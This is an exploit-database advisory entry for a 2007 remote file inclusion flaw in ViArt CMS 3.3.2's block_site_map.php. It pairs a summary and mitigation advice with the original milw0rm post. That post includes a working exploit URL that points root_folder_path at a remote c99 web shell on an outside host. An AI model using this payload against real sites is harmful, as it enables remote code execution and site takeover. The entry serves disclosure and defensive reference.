header-logo
Suggest Exploit
vendor:
ViArt CMS
by:
RoMaNcYxHaCkEr
N/A
CVSS
HIGH
Remote File Inclusion
CWE
Product Name: ViArt CMS
Affected Version From: ViArt CMS 3.3.2
Affected Version To: ViArt CMS 3.3.2
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

ViArt CMS 3.3.2 Remote File Include

The ViArt CMS 3.3.2 version is vulnerable to remote file inclusion. The vulnerability exists in the 'block_site_map.php' file, where it fails to properly validate user-supplied input before including a file. An attacker can exploit this vulnerability by sending a specially crafted request with a malicious URL to execute arbitrary code on the target system.

Mitigation:

To mitigate this vulnerability, it is recommended to update to a newer version of ViArt CMS that has addressed this issue. Alternatively, ensure that user input is properly validated and sanitized before including files.
Source

Exploit-DB raw data:

# Name : ViArt CMS 3.3.2 Remote File Include
# Download From : http://www.viart.com/downloads/viart_cms-3.3.2.zip
# Found By : RoMaNcYxHaCkEr
# Home Page : Not Yet :(
============================================================================
# Vulne Code : Line 4 :
include_once($root_folder_path . "includes/navigator.php");
# Exploit :
www.RxH.com/viart_cms-3.3.2/blocks/block_site_map.php?root_folder_path=http://no-hack.fr/shell/c99.txt?
============================================================================
# Greet To :
Cold Z3ro My Master (Hackteach.org)
Hack15 TeaM (V99x.com)
Sniper-Sa (Sniper-sa.com)
Tryag TeaM (Tryag.com)
Yee7 TeaM (Yee7.com)
My5ql Team
Also: Saudi Kafo , Adel Alroh , Mr-Google , Kill eye And All My Friends
# For Contact : RxH@HotMail.iT

# milw0rm.com [2007-12-11]